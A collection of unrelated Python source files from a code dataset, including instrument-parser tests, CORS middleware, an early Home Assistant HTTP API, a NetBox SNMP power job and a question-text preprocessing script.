OptaaStateKey.METADATA_GENERATED: True,
OptaaStateKey.TIME_SINCE_POWER_UP: 0.666
}
# Set the state.
parser.set_state(new_state)
# Read and verify the last 3 particles.
for count, expected in enumerate(EXPECTED_FILE6[-3: ]):
ntp_time, fields = expected
expected_particle = \
OptaaDjDclRecoveredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
in_file.close()
log.debug('===== START TEST SET STATE TELEMETERED =====')
in_file = self.open_file(FILE6)
parser = self.create_rec_parser(in_file, FILE6)
# Read and verify 8 particles (of the 11).
# 1 metadata particle, 7 instrument particles.
for count, expected in enumerate(EXPECTED_FILE6[ : 8]):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
expected_particle = \
OptaaDjDclTelemeteredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
expected_particle = \
OptaaDjDclTelemeteredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
# Go back in the file so that we get the last 8 particles.
new_state = {
OptaaStateKey.POSITION: 94,
OptaaStateKey.METADATA_GENERATED: True,
OptaaStateKey.TIME_SINCE_POWER_UP: 0.666
}
# Set the state.
parser.set_state(new_state)
# Read and verify the last 8 particles.
for count, expected in enumerate(EXPECTED_FILE6[-8: ]):
ntp_time, fields = expected
expected_particle = \
OptaaDjDclTelemeteredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
in_file.close()
log.debug('===== END TEST SET STATE =====')
def test_simple(self):
"""
Read data from a file and pull out data particles
one at a time. Verify that the results are those we expected.
"""
log.debug('===== START TEST SIMPLE RECOVERED =====')
in_file = self.open_file(FILE1)
parser = self.create_rec_parser(in_file, FILE1)
for count, expected in enumerate(EXPECTED_FILE1):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
expected_particle = \
OptaaDjDclRecoveredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
expected_particle = \
OptaaDjDclRecoveredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
self.assertEqual(self.rec_exception_callback_value, None)
in_file.close()
log.debug('===== START TEST SIMPLE TELEMETERED =====')
in_file = self.open_file(FILE2)
parser = self.create_tel_parser(in_file, FILE2)
for count, expected in enumerate(EXPECTED_FILE2):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
expected_particle = \
OptaaDjDclTelemeteredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
expected_particle = \
OptaaDjDclTelemeteredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
self.assertEqual(self.tel_exception_callback_value, None)
in_file.close()
log.debug('===== END TEST SIMPLE =====')
| StarcoderdataPython |
1933817 | import argparse
import uvicorn
from multidbutils._webserver.app import app
def main():
parser = argparse.ArgumentParser(description="Run py-multi-db-utility Webserver")
parser.add_argument("ip", nargs='?', metavar="ip", type=str,
help="Ip Address To Run Server On (Default: localhost).", default="localhost")
parser.add_argument("port", nargs='?', metavar="port", type=int,
help="Port To Run Server On (Default: 8000).", default=8000)
args = parser.parse_args()
uvicorn.run(app, host=args.ip, port=int(args.port), )
if __name__ == "__main__":
main()
| StarcoderdataPython |
9771326 | <gh_stars>1-10
import re
def increment(password):
last = len(password)
index = 1
while(1):
if password[last - index] == 'z':
password[last - index] = 'a'
index +=1
else:
password[last - index] = chr(ord(password[last - index])+1)
break
return password
password = list("<PASSWORD>")
count = 0
match = 0
while(1):
if len(re.findall("[iol]", "".join(password))):
pass
elif len(re.findall("(.)\\1", "".join(password))) < 2:
pass
else:
count = 0
for i, element in enumerate(password):
if i == len(password) - 1:
break
if ord(password[i + 1]) - ord(element) == 1:
count += 1
if count == 2:
print "pass"
count = 0
match = 1
break
else:
count = 0
if match:
break
password = increment(password)
print "".join(password)
| StarcoderdataPython |
3441755 | """
Adds the following features to an ASGI app:
* CORS middleware
"""
import functools
import re
import typing
from starlette.datastructures import Headers, MutableHeaders
from starlette.responses import PlainTextResponse
ALL_METHODS = ("DELETE", "GET", "OPTIONS", "PATCH", "POST", "PUT")
SAFELISTED_HEADERS = {
"Accept", "Accept-Language", "Content-Language", "Content-Type"
}
class CorsASGIApp:
def __init__(
self,
app,
origins: typing.Sequence[str] = (),
allow_methods: typing.Sequence[str] = ("GET",),
allow_headers: typing.Sequence[str] = (),
allow_credentials: bool = False,
allow_origin_regex: str = None,
expose_headers: typing.Sequence[str] = (),
max_age: int = 600,
) -> None:
if "*" in allow_methods:
allow_methods = ALL_METHODS
compiled_allow_origin_regex = None
if allow_origin_regex is not None:
compiled_allow_origin_regex = re.compile(allow_origin_regex)
simple_headers = {}
if "*" in origins:
simple_headers["Access-Control-Allow-Origin"] = "*"
if allow_credentials:
simple_headers["Access-Control-Allow-Credentials"] = "true"
if expose_headers:
simple_headers["Access-Control-Expose-Headers"] = \
", ".join(expose_headers)
preflight_headers = {}
if "*" in origins:
preflight_headers["Access-Control-Allow-Origin"] = "*"
else:
preflight_headers["Vary"] = "Origin"
preflight_headers.update(
{
"Access-Control-Allow-Methods": ", ".join(allow_methods),
"Access-Control-Max-Age": str(max_age),
}
)
allow_headers = sorted(SAFELISTED_HEADERS | set(allow_headers))
if allow_headers and "*" not in allow_headers:
preflight_headers["Access-Control-Allow-Headers"] = \
", ".join(allow_headers)
if allow_credentials:
preflight_headers["Access-Control-Allow-Credentials"] = "true"
self.app = app
self.origins = origins
self.allow_methods = allow_methods
self.allow_headers = [h.lower() for h in allow_headers]
self.allow_all_origins = "*" in origins
self.allow_all_headers = "*" in allow_headers
self.allow_origin_regex = compiled_allow_origin_regex
self.simple_headers = simple_headers
self.preflight_headers = preflight_headers
async def __call__(
self, scope, receive, send
) -> None:
if scope["type"] != "http": # pragma: no cover
handler = await self.app(scope, receive, send)
await handler.__call__(receive, send)
return
method = scope["method"]
headers = Headers(scope=scope)
origin = headers.get("origin")
if origin is None:
handler = await self.app(scope, receive, send)
await handler.__call__(receive, send)
return
if method == "OPTIONS" and "access-control-request-method" in headers:
response = self.preflight_response(request_headers=headers)
await response(scope, receive, send)
return
await self.simple_response(
scope, receive, send, request_headers=headers
)
def is_allowed_origin(self, origin: str) -> bool:
if self.allow_all_origins:
return True
if self.allow_origin_regex is not None and \
self.allow_origin_regex.fullmatch(origin):
return True
return any(host in origin for host in self.origins)
def preflight_response(self, request_headers) -> PlainTextResponse:
requested_origin = request_headers["origin"]
requested_method = request_headers["access-control-request-method"]
requested_headers = request_headers.get(
"access-control-request-headers"
)
headers = dict(self.preflight_headers)
failures = []
if self.is_allowed_origin(origin=requested_origin):
if not self.allow_all_origins:
headers["Access-Control-Allow-Origin"] = requested_origin
else:
failures.append("origin")
if requested_method not in self.allow_methods:
failures.append("method")
if self.allow_all_headers and requested_headers is not None:
headers["Access-Control-Allow-Headers"] = requested_headers
elif requested_headers is not None:
for header in [h.lower() for h in requested_headers.split(",")]:
if header.strip() not in self.allow_headers:
failures.append("headers")
if failures:
failure_text = "Disallowed CORS " + ", ".join(failures)
return PlainTextResponse(
failure_text, status_code=400, headers=headers
)
return PlainTextResponse("OK", status_code=200, headers=headers)
async def simple_response(
self,
scope,
receive,
send,
request_headers
) -> None:
send = functools.partial(
self.send, send=send, request_headers=request_headers
)
handler = await self.app(scope, receive, send)
await handler(receive, send)
async def send(self, message, send, request_headers) -> None:
if message["type"] != "http.response.start":
await send(message)
return
message.setdefault("headers", [])
headers = MutableHeaders(scope=message)
headers.update(self.simple_headers)
origin = request_headers["Origin"]
has_cookie = "cookie" in request_headers
if self.allow_all_origins and has_cookie:
headers["Access-Control-Allow-Origin"] = origin
elif not self.allow_all_origins and \
self.is_allowed_origin(origin=origin):
headers["Access-Control-Allow-Origin"] = origin
headers.add_vary_header("Origin")
await send(message)
| StarcoderdataPython |
11251092 | <reponame>FrancoisLopez/netman<gh_stars>10-100
from hamcrest import assert_that, is_
from adapters.compliance_test_case import ComplianceTestCase
from netman.core.objects.exceptions import UnknownVlan
from tests import has_message
class SetVlanNtpStateTest(ComplianceTestCase):
_dev_sample = "cisco"
def setUp(self):
super(SetVlanNtpStateTest, self).setUp()
self.client.add_vlan(2999, name="my-test-vlan")
def test_disables_ntp_when_given_false(self):
self.try_to.set_vlan_ntp_state(2999, False)
vlan = self.get_vlan_from_list(2999)
assert_that(vlan.ntp, is_(False))
def test_enables_ntp_when_given_true(self):
self.try_to.set_vlan_ntp_state(2999, True)
vlan = self.get_vlan_from_list(2999)
assert_that(vlan.ntp, is_(True))
def test_raises_UnknownVlan_when_operating_on_a_vlan_that_does_not_exist(self):
with self.assertRaises(UnknownVlan) as expect:
self.client.set_vlan_ntp_state(2000, False)
assert_that(expect.exception, has_message("Vlan 2000 not found"))
def tearDown(self):
self.janitor.remove_vlan(2999)
super(SetVlanNtpStateTest, self).tearDown()
| StarcoderdataPython |
3372248 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def f_y(theta, x):
return (theta[0] + theta[1] * x) / - theta[2]
def plotDecisionBoundary(theta, X, y):
import numpy as np
import matplotlib.pyplot as plt
from ex2_logistic_regression.plotData import plotData
plotData(X[:, 1:], y)
m, n = np.shape(X)
if n <= 3:
min_x = min(X[:, 1])
max_x = max(X[:, 1])
x = np.array([X[:, 1].min(), X[:, 1].max()])
if n < 2:
theta[3] = 1
y = [f_y(theta, min_x), f_y(theta, max_x)]
plt.figure(1)
plt.title('Linear regression With GCD')
plt.xlabel('x')
plt.ylabel('y')
plt.scatter(x, y, marker='o', color='k', s=10, label='point')
plt.legend(loc='lower right')
plt.plot(x, y)
plt.show()
else:
from ex2_logistic_regression.mapFeature import mapFeature
x = np.linspace(-1, 1.5, 50)
y = np.linspace(-1, 1.5, 50)
z = np.zeros(shape=(len(x), len(y)))
for i in range(len(x)):
for j in range(len(y)):
z[i, j] = (mapFeature([x[i]], [y[j]]).dot(theta))
z = z.T
c = plt.contour(x, y, z, 0, origin='upper')
c.collections[0].set_label('Decision Boundary')
| StarcoderdataPython |
9680683 | import logging
from datetime import datetime
import django_rq
from django.conf import settings
from django_rq import job
from dcim.models import Device
from easysnmp import EasySNMPError, snmp_get
from .models import PDUConfig, PDUStatus
logger = logging.getLogger("rq.worker")
logger.setLevel(logging.DEBUG)
@job
def collect_power_usage_info():
config = settings.PLUGINS_CONFIG["axians_netbox_pdu"]
devices = Device.objects.filter().exclude(device_type__pduconfig__isnull=True).exclude(primary_ip4__isnull=True)
logging.info("Start: Collecting Power Usage Information")
results = []
for device in devices:
try:
power_usage = snmp_get(
device.device_type.pduconfig.power_usage_oid,
hostname=str(device.primary_ip4.address.ip),
community=config["snmp_read"],
version=2,
)
except EasySNMPError as err:
logging.error(f"Failed to get power usage status for {device.name}: {err}.")
raise
pdu_status = PDUStatus.objects.update_or_create(device=device, defaults={"power_usage": power_usage.value})
data = {device.name: power_usage.value}
results.append(data)
logging.info("FINISH: Collecting Power Usage Information")
return results
| StarcoderdataPython |
5184509 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name="simplerosbag",
version="0.1",
packages=['genpy', 'genmsg', 'std_msgs', 'simplerosbag'],
)
| StarcoderdataPython |
273496 | """Vagrant specific install profile."""
from .. import vagrant_aliases as aliases
DEFAULTS = {
'treadmill_dns_domain': 'treadmill.internal',
'treadmill_dns_server': '10.10.10.10'
}
ALIASES = aliases.ALIASES
| StarcoderdataPython |
6410111 | from __future__ import print_function
def cprint(*args, **kwargs):
if not hasattr(cprint, 'table'):
cprint.table = {}
cprint.table['RED'] = '\033[91m'
cprint.table['GREEN'] = '\033[92m'
cprint.table['YELLOW'] = '\033[93m'
cprint.table['BLUE'] = '\033[94m'
cprint.table['MAGENTA'] = '\033[95m'
cprint.table['CYAN'] = '\033[96m'
cprint.table['WHITE'] = '\033[97m'
cprint.table['ENDC'] = '\033[0m'
if 'color' in kwargs:
color = kwargs['color']
del kwargs['color']
else:
color = 'BLUE'
color = color.upper()
if color not in cprint.table:
color = 'BLUE'
print(cprint.table[color], end='')
print(*args, **kwargs)
print(cprint.table['ENDC'], end='')
if __name__ == '__main__':
cprint('Test', color='RED')
cprint('Test', color='BLUE')
cprint('Test', color='GREEN')
cprint('Test', color='YELLOW')
cprint('Test', color='MAGENTA')
cprint('Test', color='CYAN')
cprint('Test', color='WHITE')
print('Test')
| StarcoderdataPython |
1736377 | """
homeassistant.httpinterface
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides an API and a HTTP interface for debug purposes.
By default it will run on port 8123.
All API calls have to be accompanied by an 'api_password' parameter and will
return JSON. If successful calls will return status code 200 or 201.
Other status codes that can occur are:
- 400 (Bad Request)
- 401 (Unauthorized)
- 404 (Not Found)
- 405 (Method not allowed)
The api supports the following actions:
/api/states - GET
Returns a list of categories for which a state is available
Example result:
{
"categories": [
"Paulus_Nexus_4",
"weather.sun",
"all_devices"
]
}
/api/states/<category> - GET
Returns the current state from a category
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"category": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/states/<category> - POST
Updates the current state of a category. Returns status code 201 if successful
with location header of updated resource and as body the new state.
parameter: new_state - string
optional parameter: attributes - JSON encoded object
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"category": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/events/<event_type> - POST
Fires an event with event_type
optional parameter: event_data - JSON encoded object
Example result:
{
"message": "Event download_file fired."
}
"""
import json
import threading
import logging
import re
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from urlparse import urlparse, parse_qs
import homeassistant as ha
import homeassistant.util as util
SERVER_PORT = 8123
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_MOVED_PERMANENTLY = 301
HTTP_BAD_REQUEST = 400
HTTP_UNAUTHORIZED = 401
HTTP_NOT_FOUND = 404
HTTP_METHOD_NOT_ALLOWED = 405
HTTP_UNPROCESSABLE_ENTITY = 422
URL_ROOT = "/"
URL_CHANGE_STATE = "/change_state"
URL_FIRE_EVENT = "/fire_event"
URL_API_STATES = "/api/states"
URL_API_STATES_CATEGORY = "/api/states/{}"
URL_API_EVENTS = "/api/events"
URL_API_EVENTS_EVENT = "/api/events/{}"
URL_STATIC = "/static/{}"
class HTTPInterface(threading.Thread):
""" Provides an HTTP interface for Home Assistant. """
# pylint: disable=too-many-arguments
def __init__(self, eventbus, statemachine, api_password,
server_port=None, server_host=None):
threading.Thread.__init__(self)
self.daemon = True
if not server_port:
server_port = SERVER_PORT
# If no server host is given, accept all incoming requests
if not server_host:
server_host = '0.0.0.0'
self.server = HTTPServer((server_host, server_port), RequestHandler)
self.server.flash_message = None
self.server.logger = logging.getLogger(__name__)
self.server.eventbus = eventbus
self.server.statemachine = statemachine
self.server.api_password = <PASSWORD>
eventbus.listen_once(ha.EVENT_HOMEASSISTANT_START,
lambda event: self.start())
def run(self):
""" Start the HTTP interface. """
self.server.logger.info("Starting")
self.server.serve_forever()
class RequestHandler(BaseHTTPRequestHandler):
""" Handles incoming HTTP requests """
PATHS = [ # debug interface
('GET', '/', '_handle_get_root'),
('POST', re.compile(r'/change_state'), '_handle_change_state'),
('POST', re.compile(r'/fire_event'), '_handle_fire_event'),
# /states
('GET', '/api/states', '_handle_get_api_states'),
('GET',
re.compile(r'/api/states/(?P<category>[a-zA-Z\._0-9]+)'),
'_handle_get_api_states_category'),
('POST',
re.compile(r'/api/states/(?P<category>[a-zA-Z\._0-9]+)'),
'_handle_change_state'),
# /events
('GET', '/api/events', '_handle_get_api_events'),
('POST',
re.compile(r'/api/events/(?P<event_type>[a-zA-Z\._0-9]+)'),
'_handle_fire_event'),
# Statis files
('GET', re.compile(r'/static/(?P<file>[a-zA-Z\._\-0-9/]+)'),
'_handle_get_static')
]
use_json = False
def _handle_request(self, method): # pylint: disable=too-many-branches
""" Does some common checks and calls appropriate method. """
url = urlparse(self.path)
# Read query input
data = parse_qs(url.query)
# Did we get post input ?
content_length = int(self.headers.get('Content-Length', 0))
if content_length:
data.update(parse_qs(self.rfile.read(content_length)))
try:
api_password = data['api_password'][0]
except KeyError:
api_password = ''
if url.path.startswith('/api/'):
self.use_json = True
# Var to keep track if we found a path that matched a handler but
# the method was different
path_matched_but_not_method = False
# Var to hold the handler for this path and method if found
handle_request_method = False
# Check every handler to find matching result
for t_method, t_path, t_handler in RequestHandler.PATHS:
# we either do string-comparison or regular expression matching
if isinstance(t_path, str):
path_match = url.path == t_path
else:
# pylint: disable=maybe-no-member
path_match = t_path.match(url.path)
if path_match and method == t_method:
# Call the method
handle_request_method = getattr(self, t_handler)
break
elif path_match:
path_matched_but_not_method = True
# Did we find a handler for the incoming request?
if handle_request_method:
# Do not enforce api password for static files
if handle_request_method == self._handle_get_static or \
self._verify_api_password(api_password):
handle_request_method(path_match, data)
elif path_matched_but_not_method:
self.send_response(HTTP_METHOD_NOT_ALLOWED)
else:
self.send_response(HTTP_NOT_FOUND)
def do_GET(self): # pylint: disable=invalid-name
""" GET request handler. """
self._handle_request('GET')
def do_POST(self): # pylint: disable=invalid-name
""" POST request handler. """
self._handle_request('POST')
def _verify_api_password(self, api_password):
""" Helper method to verify the API password
and take action if incorrect. """
if api_password == self.server.api_password:
return True
elif self.use_json:
self._message(
"API password missing or incorrect.", HTTP_UNAUTHORIZED)
else:
self.send_response(HTTP_OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write((
"<html>"
"<head><title>Home Assistant</title>"
"<link rel='stylesheet' type='text/css' "
"href='/static/style.css'>"
"<link rel='icon' href='/static/favicon.ico' "
"type='image/x-icon' />"
"</head>"
"<body>"
"<div class='container'>"
"<form class='form-signin' action='{}' method='GET'>"
"<input type='text' class='form-control' name='api_password' "
"placeholder='API Password for Home Assistant' "
"required autofocus>"
"<button class='btn btn-lg btn-primary btn-block' "
"type='submit'>Enter</button>"
"</form>"
"</div>"
"</body></html>").format(self.path))
return False
# pylint: disable=unused-argument
def _handle_get_root(self, path_match, data):
""" Renders the debug interface. """
write = lambda txt: self.wfile.write(txt+"\n")
self.send_response(HTTP_OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
write(("<html>"
"<head><title>Home Assistant</title>"
"<link rel='stylesheet' type='text/css' "
"href='/static/style.css'>"
"<link rel='icon' href='/static/favicon.ico' "
"type='image/x-icon' />"
"</head>"
"<body>"
"<div class='container'>"
"<div class='page-header'><h1>Home Assistant</h1></div>"
))
# Flash message support
if self.server.flash_message:
write(("<div class='row'><div class='col-xs-12'>"
"<div class='alert alert-success'>"
"{}</div></div></div>").format(self.server.flash_message))
self.server.flash_message = None
# Describe state machine:
categories = []
write(("<div class='row'>"
"<div class='col-xs-12'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"States</h2></div>"
"<form method='post' action='/change_state' "
"class='form-change-state'>"
"<input type='hidden' name='api_password' value='{}'>"
"<table class='table'><tr>"
"<th>Category</th><th>State</th>"
"<th>Attributes</th><th>Last Changed</th>"
"</tr>").format(self.server.api_password))
for category in \
sorted(self.server.statemachine.categories,
key=lambda key: key.lower()):
categories.append(category)
state = self.server.statemachine.get_state(category)
attributes = "<br>".join(
["{}: {}".format(attr, state['attributes'][attr])
for attr in state['attributes']])
write(("<tr>"
"<td>{}</td><td>{}</td><td>{}</td><td>{}</td>"
"</tr>").format(
category,
state['state'],
attributes,
state['last_changed']))
# Change state form
write(("<tr><td><input name='category' class='form-control' "
"placeholder='Category'></td>"
"<td><input name='new_state' class='form-control' "
"placeholder='New State'></td>"
"<td><textarea rows='3' name='attributes' class='form-control' "
"placeholder='State Attributes (JSON, optional)'>"
"</textarea></td>"
"<td><button type='submit' class='btn btn-default'>"
"Set State</button></td></tr>"
"</table></form></div>"
"</div></div>"))
# Describe event bus:
write(("<div class='row'>"
"<div class='col-xs-6'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"Events</h2></div>"
"<table class='table'>"
"<tr><th>Event Type</th><th>Listeners</th></tr>"))
for event_type, count in sorted(
self.server.eventbus.listeners.items()):
write("<tr><td>{}</td><td>{}</td></tr>".format(event_type, count))
write(("</table></div></div>"
"<div class='col-xs-6'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"Fire Event</h2></div>"
"<div class='panel-body'>"
"<form method='post' action='/fire_event' "
"class='form-horizontal form-fire-event'>"
"<input type='hidden' name='api_password' value='{}'>"
"<div class='form-group'>"
"<label for='event_type' class='col-xs-3 control-label'>"
"Event type</label>"
"<div class='col-xs-9'>"
"<input type='text' class='form-control' id='event_type'"
" name='event_type' placeholder='Event Type'>"
"</div>"
"</div>"
"<div class='form-group'>"
"<label for='event_data' class='col-xs-3 control-label'>"
"Event data</label>"
"<div class='col-xs-9'>"
"<textarea rows='3' class='form-control' id='event_data'"
" name='event_data' placeholder='Event Data "
"(JSON, optional)'></textarea>"
"</div>"
"</div>"
"<div class='form-group'>"
"<div class='col-xs-offset-3 col-xs-9'>"
"<button type='submit' class='btn btn-default'>"
"Fire Event</button>"
"</div>"
"</div>"
"</form>"
"</div></div></div>"
"</div>").format(self.server.api_password))
write("</div></body></html>")
# pylint: disable=invalid-name
def _handle_change_state(self, path_match, data):
""" Handles updating the state of a category.
This handles the following paths:
/change_state
/api/states/<category>
"""
try:
try:
category = path_match.group('category')
except IndexError:
# If group 'category' does not exist in path_match
category = data['category'][0]
new_state = data['new_state'][0]
try:
attributes = json.loads(data['attributes'][0])
except KeyError:
# Happens if key 'attributes' does not exist
attributes = None
# Write state
self.server.statemachine.set_state(category,
new_state,
attributes)
# Return state if json, else redirect to main page
if self.use_json:
state = self.server.statemachine.get_state(category)
state['category'] = category
self._write_json(state, status_code=HTTP_CREATED,
location=
URL_API_STATES_CATEGORY.format(category))
else:
self._message(
"State of {} changed to {}".format(category, new_state))
except KeyError:
# If new_state don't exist in post data
self._message(
"No new_state submitted.", HTTP_BAD_REQUEST)
except ValueError:
# Occurs during error parsing json
self._message(
"Invalid JSON for attributes", HTTP_UNPROCESSABLE_ENTITY)
# pylint: disable=invalid-name
def _handle_fire_event(self, path_match, data):
""" Handles firing of an event.
This handles the following paths:
/fire_event
/api/events/<event_type>
"""
try:
try:
event_type = path_match.group('event_type')
except IndexError:
# If group event_type does not exist in path_match
event_type = data['event_type'][0]
try:
event_data = json.loads(data['event_data'][0])
except KeyError:
# Happens if key 'event_data' does not exist
event_data = None
self.server.eventbus.fire(event_type, event_data)
self._message("Event {} fired.".format(event_type))
except KeyError:
# Occurs if event_type does not exist in data
self._message("No event_type received.", HTTP_BAD_REQUEST)
except ValueError:
# Occurs during error parsing json
self._message(
"Invalid JSON for event_data", HTTP_UNPROCESSABLE_ENTITY)
# pylint: disable=unused-argument
def _handle_get_api_states(self, path_match, data):
""" Returns the categories which state is being tracked. """
self._write_json({'categories': self.server.statemachine.categories})
# pylint: disable=unused-argument
def _handle_get_api_states_category(self, path_match, data):
""" Returns the state of a specific category. """
category = path_match.group('category')
state = self.server.statemachine.get_state(category)
if state:
state['category'] = category
self._write_json(state)
else:
# If category does not exist
self._message("State does not exist.", HTTP_UNPROCESSABLE_ENTITY)
def _handle_get_api_events(self, path_match, data):
""" Handles getting overview of event listeners. """
self._write_json({'listeners': self.server.eventbus.listeners})
def _handle_get_static(self, path_match, data):
""" Returns a static file. """
req_file = util.sanitize_filename(path_match.group('file'))
path = os.path.join(os.path.dirname(__file__), 'www_static', req_file)
if os.path.isfile(path):
self.send_response(HTTP_OK)
# TODO: correct header for mime-type and caching
self.end_headers()
with open(path, 'rb') as inp:
data = inp.read(1024)
while data:
self.wfile.write(data)
data = inp.read(1024)
else:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
def _message(self, message, status_code=HTTP_OK):
""" Helper method to return a message to the caller. """
if self.use_json:
self._write_json({'message': message}, status_code=status_code)
elif status_code == HTTP_OK:
self.server.flash_message = message
self._redirect('/')
else:
self.send_error(status_code, message)
def _redirect(self, location):
""" Helper method to redirect caller. """
self.send_response(HTTP_MOVED_PERMANENTLY)
self.send_header(
"Location", "{}?api_password={}".format(
location, self.server.api_password))
self.end_headers()
def _write_json(self, data=None, status_code=HTTP_OK, location=None):
""" Helper method to return JSON to the caller. """
self.send_response(status_code)
self.send_header('Content-type', 'application/json')
if location:
self.send_header('Location', location)
self.end_headers()
if data:
self.wfile.write(json.dumps(data, indent=4, sort_keys=True))
| StarcoderdataPython |
9752261 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" script for preprocessing question texts in parallel
"""
import argparse
import sys
import os
import re
import numpy as np
import pandas as pd
import traceback
import time
import gensim
import nltk
import tqdm
import phonenumbers
from multiprocessing import Process, Pool
from multiprocessing.managers import BaseManager, NamespaceProxy
import utils
import siamese_evaluation
WORD2VEC_FILE = "./resource/GoogleNews-vectors-negative300.bin.gz"
PREPROCESS_GENERAL = "./resource/replace.csv"
PREPROCESS_UNITS = "./resource/units.csv"
def parse_args(argv):
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("outdir", help="output directory")
parser.add_argument("files", nargs="+", help="csv files contains raw data")
return parser.parse_args(argv)
class SharedResource(object):
"""
hold a list of vocabulary used in text preprocessing
"""
def __init__(self, vocabs):
self.vocabs = vocabs
def get(self, fname):
if fname == "vocabs":
return self.vocabs
raise Exception("{0} is not defined".format(fname))
class ResourceManager(BaseManager):
pass
ResourceManager.register("SharedResource", SharedResource)
def aggregate(ret):
"""
append dataframe objects that are processed in parallel
Args:
ret: a dataframe object returned by a process
"""
aggregate.out.append(ret)
aggregate.out = []
def prep(text, vocabs):
"""
substitute special characters, replace abbreviations, and encode to ascii
Args:
text: a question
vocabs: a list of vocabulary available in a pretrained word2vec model
Returns:
preprocessed text
"""
text = text.decode("utf-8")
text = re.sub("’", "'", text)
text = re.sub("`", "'", text)
text = re.sub("“", '"', text)
text = re.sub("?", "?", text)
text = re.sub("…", " ", text)
text = re.sub("é", "e", text)
text = re.sub(r"\.+", ".", text)
text = text.replace("[math]", " ")
text = text.replace("[/math]", " ")
if prep.dict is None:
prep.dict = pd.read_csv(PREPROCESS_GENERAL).set_index("src")[
"dst"].to_dict()
for k in prep.dict.keys():
prep.dict[k.lower()] = prep.dict[k]
for k in prep.dict.keys():
if k in text:
text = text.replace(k, prep.dict[k])
if prep.units is None:
with open(PREPROCESS_UNITS, "rU") as f:
prep.units = [l.replace('\n', '') for l in f]
for u in prep.units:
text = re.sub(r"(\d+\.\d+){0}".format(u), "\\1 {0}".format(u), text)
matches = re.finditer(r"([a-zA-z]*)\.([a-zA-z]*)", text)
for match in matches:
m01 = match.group(0)
m0 = match.group(1)
m1 = match.group(2)
if m01 not in vocabs and m1 in vocabs \
and m1.lower() not in ("com", "org", "net", "exe", "js", "biz", "care", "ly", "io", "in", "jp", "au", "gov", "ca", "cn", "fr", "hk", "kr", "mx") \
and (m1.lower() in ("i", "a") or len(m1) > 1) \
and m1[-1] != ".":
text = text.replace(m01, m01.replace(".", ". "))
matches = re.finditer(r"([a-zA-z]*)?([a-zA-z]*)", text)
for match in matches:
m01 = match.group(0)
m0 = match.group(1)
m1 = match.group(2)
if m01 not in vocabs and m0 in vocabs \
and m1 in vocabs \
and (m1.lower() in ("i", "a") or len(m1) > 1):
text = text.replace(m01, m01.replace(".", ". "))
text = re.sub(r"/", " or ", text)
text = text.encode("ascii", "ignore")
return text
prep.dict = None
prep.units = None
def post(tokens):
"""
post-process output from NLTK tokenizer
Args:
tokens: a list contains a tokenized text
Returns:
processed tokens
"""
out = []
for t in tokens:
if t[-1] == ".":
out.append(t[:-1])
else:
out.append(t)
return out
def tokenize_wrapper(text):
"""
wrapper function for NLTK tokenizer
Args:
text: a question
Returns:
a list contains a tokenized text
"""
tokens = nltk.word_tokenize(text)
out = []
for t in tokens:
if t[-1] == ".":
out.append(t[:-1])
else:
out.append(t)
return out
def indices_for(df, nprocs):
"""
group rows in dataframe and assign each group to each process
Args:
df: Pandas dataframe object
nprocs: number of processes used
Returns:
indeces grouped to each process
"""
N = df.shape[0]
L = int(N / nprocs)
indices = []
for i in range(nprocs):
for j in range(L):
indices.append(i)
for i in range(N - (nprocs * L)):
indices.append(nprocs - 1)
return indices
def init_shared_resource(vocabs):
manager = ResourceManager()
manager.start()
shared_resource = manager.SharedResource(vocabs)
return shared_resource
def preprocess(shared_resource, df, nprocs):
"""
perform basic preprocessing in parallel
Args:
df: Pandas dataframe object
nprocs: number of processes used
Returns:
Pandas dataframe object with preprocessed texts
"""
t = time.time()
# run in parallel
pool = Pool(nprocs)
for i, (name, df_group) in enumerate(df.groupby(indices_for(df, nprocs))):
pool.apply_async(func=base_worker, args=(
shared_resource, df_group, i), callback=aggregate)
pool.close()
pool.join()
# post process
aggregate.out.sort(key=lambda x: x[0])
df_out = pd.concat([df_ret for i, df_ret in aggregate.out])
aggregate.out = []
print("Time {0} sec".format(time.time() - t))
return df_out
def base_worker(shared_resource, df, iproc):
"""
base worker function for text preprocessing
Args:
shared_obj: word2vec dictionary
df: Pandas dataframe object
iproc: process index
Returns:
Pandas dataframe object with preprocessed texts
"""
try:
df.fillna(value="", inplace=True)
vocabs = shared_resource.get("vocabs")
print("basic preprocessing")
# preprocess
df["q1"] = df["question1"].apply(prep, args=(vocabs,))
